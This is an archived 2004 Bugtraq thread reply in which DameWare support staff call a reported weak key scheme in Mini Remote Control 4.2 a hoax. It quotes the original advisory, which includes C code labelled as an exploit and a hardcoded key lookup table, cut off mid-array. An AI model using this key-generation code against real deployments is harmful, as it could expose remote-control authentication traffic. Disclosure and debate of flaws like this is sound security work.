Re: (HOAX) Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme
In-Reply-To: <20040430182646.29912.qmail@xxxxxxxxxxxxxxxxxxxxx>
This is definitely not an exploit, nor is it a vulnerability and therefore
inaccurate & misleading. Furthermore, the information submitted by
ax09001h@xxxxxxxxxxx has nothing to do with obtaining the Session Encryption
Key, nor does it reveal any confidential information. It is entirely
"pre-authentication" information that has nothing to do with the Session
Encryption Key, and it cannot be used to obtain the actual Session Encryption
Key.
The "Pre Authentication" data that is being encrypted/decrypted at this point
in the remote control connection is not sensitive information and could just as
well be sent in plain text. This so called "weak key" is not used for
encrypting sensitive data and is only is used once for a single transmission of
pre authentication data.
ax09001h@xxxxxxxxxxx made no attempts to contact DameWare Development directly
to verify this claim before releasing the information. It is extremely
irresponsible for anyone to release this kind of information without first
contacting the vendor to verify its accuracy. Based on his or her actions it's
fairly obvious that this anonymous person and or company are deliberately
attempting to discredit DameWare Development & it's Mini Remote Control program.
Support Staff
DameWare Development, LLC.
http://www.dameware.com
>Received: (qmail 2813 invoked from network); 30 Apr 2004 19:34:03 -0000
>Received: from outgoing3.securityfocus.com (HELO outgoing.securityfocus.com)
>(205.206.231.27)
> by mail.securityfocus.com with SMTP; 30 Apr 2004 19:34:03 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com
>[205.206.231.20])
> by outgoing.securityfocus.com (Postfix) with QMQP
> id EE330236FDE; Fri, 30 Apr 2004 21:27:49 -0600 (MDT)
>Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
>List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
>List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
>Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
>Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
>Received: (qmail 16648 invoked from network); 30 Apr 2004 12:57:51 -0000
>Date: 30 Apr 2004 18:26:46 -0000
>Message-ID: <20040430182646.29912.qmail@xxxxxxxxxxxxxxxxxxxxx>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: ax09001h <ax09001h@xxxxxxxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme
>
>
>
>Title: Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme
>
>Versions: Dameware Mini Remote Control Version 4.2
>
>
>Vulnerability: The latest version of Dameware?s Mini Remote Control System
>uses a weak key agreement scheme. The scheme consists of the sharing of
>pointers into a fixed key lookup table. Both the client and the server have
>access to a key lookup table (KLT) consisting of 1000 32-bit values. Prior
>to encrypting traffic the server sends to the client a series of 32-bit
>integers, call it the key index table (KIT). For the sake of description lets
>call the indices klt_idx[4], an array of 4 32-bit integers. The klt_idx are
>set as follows:
>
>klt_idx[0] = KIT[100];
>klt_idx[1] = KIT[4];
>klt_idx[2] = 42;
>klt_idx[3] = KIT[37];
>
>The actual session key is then constructed as 4 32-bit integers, sk[4] as
>follows.
>
> sk[0] = KLT[klt_idx[0]];
> sk[1] = KLT[klt_idx[1]];
> sk[2] = KLT[klt_idx[2]];
> sk[3] = KLT[klt_idx[3]];
>
>This of course produces 0-bits of security.
>
>They proceed to correct the Electronic Code Book mode of encrypting other
>authentication packets using the above constructed key using Blowfish in
>cipher block chaining mode with an IV = 0.
>
>Exploit:
>
>/*
>
> dwgenkey.c dameware generate key program.
>
> this function mimics the dameware
> key generation algorithm used to
> pass encrypted windows authentication
> across between client and server
>
>
> ax09001h@xxxxxxxxxxx
>
>
>*/
>
>
>#include <stdio.h>
>#include <stdlib.h>
>
>
>unsigned int KLT [1000] =
>{
> 0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
> 0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
> 0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29,
> 0x48A20FA2,
> 0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB,
> 0xBC2B83CD,
> 0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058,
> 0x5474C05,
> 0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A,
> 0xCFA8D725,
> 0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762,
> 0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16, 0x846238D7, 0x9B9C7F88,
> 0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD, 0x5434DB89, 0x2B00247B,
> 0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8, 0x6E4F97D5, 0x8910C7AE,
> 0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B, 0xB226FFC5, 0x5C1D1096,
> 0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9, 0x80154A84, 0x38987089,
> 0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04, 0xC790C3E5, 0xF0E9E87E,
> 0xB9F8AF1C, 0xF797E46C, 0x5F2F339D, 0xB792AB5F, 0x462050F7,
> 0xF922EDBD,
> 0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821,
> 0xAA69288, 0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23,
> 0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E,
> 0xC5B5AED3, 0x420BFE41, 0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3,
> 0xFD572127, 0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7,
> 0x84ACE5F7,
> 0x1093FA43, 0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B,
> 0xAA6E479B,
> 0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
> 0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
> 0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
> 0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
> 0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
> 0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22,
> 0x7A153138,
> 0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E,
> 0x2E464810,
> 0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0,
> 0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642,
> 0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7,
> 0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA,
> 0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 0xDA3EAE89, 0xA1A00078,
> 0xB55B5C3E,
> 0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D,
> 0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E,
> 0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1,
> 0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244,
> 0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86,
> 0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E,
> 0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B,
> 0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC,
> 0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0,
> 0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9,
> 0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C,
> 0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6,
> 0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61,
> 0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4,
> 0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF,
> 0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
> 0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
> 0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
> 0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6,
> 0xF53E8558,
> 0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C,
> 0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8,
> 0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809,
> 0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856,
> 0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB,
> 0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9,
> 0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405,
> 0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B,
> 0x51FA1A82, 0xB5A325A9, 0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D,
> 0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942,
> 0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04,
> 0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D,
> 0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621,
> 0xC421154, 0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
> 0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
> 0x7C07054, 0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9, 0x27C3B146,
> 0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
> 0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
> 0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
> 0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81,
> 0x98E93630,
> 0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8,
> 0xAF2A72E8,
> 0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601,
> 0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6,
> 0xA3C182A3,
> 0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB, 0x5E729975, 0x5285CEC2,
> 0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597, 0xC36CD9A, 0xA45A497,
> 0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF, 0xBF109C2E, 0x402A1D1C,
> 0x67DEDD8, 0x97061C4A, 0x936BACD0, 0xC34A5C19, 0xF40F90FE, 0xD7B03D1,
> 0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2,
> 0x76E7D2A6, 0x536501F, 0xC77CA12B, 0x5E6E2842, 0x9896F26C,
> 0x2BC45D27,
> 0xE2FF89C7, 0x11FBC8C, 0x252652BD, 0x61AA26A4, 0xF3DF28A,
> 0xAFB90C39,
> 0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE, 0x2630C3A2, 0xC0F995BC,
> 0x27677058,
> 0x49E5FA9C, 0x3B66C518, 0x7654283D, 0xB8305341, 0x72E94CF,
> 0x3E181088,
> 0x9F721122, 0xC536D545, 0x8BD48FE7, 0xA0899C0F, 0x950D4B9C,
> 0xCDFA8F86,
> 0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C,
> 0x2ABB9F51, 0xC90E060A, 0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C,
> 0x1644830E, 0xC210F8D0, 0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D,
> 0xC3650D3F, 0x832E301C, 0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4,
> 0x694B8053, 0x8C003F9E, 0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B,
> 0x151F60A6, 0x224E32E5, 0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990,
> 0x66C4A629, 0x1281D60A, 0xE0178028, 0x44E6DEBD, 0xBAAB265, 0x384C4B56,
> 0xDC2F9A2C, 0x470211A4, 0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9,
> 0xC144F12E, 0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C,
> 0x343B65E3,
> 0x6B32E419, 0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70,
> 0xFA441603,
> 0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA63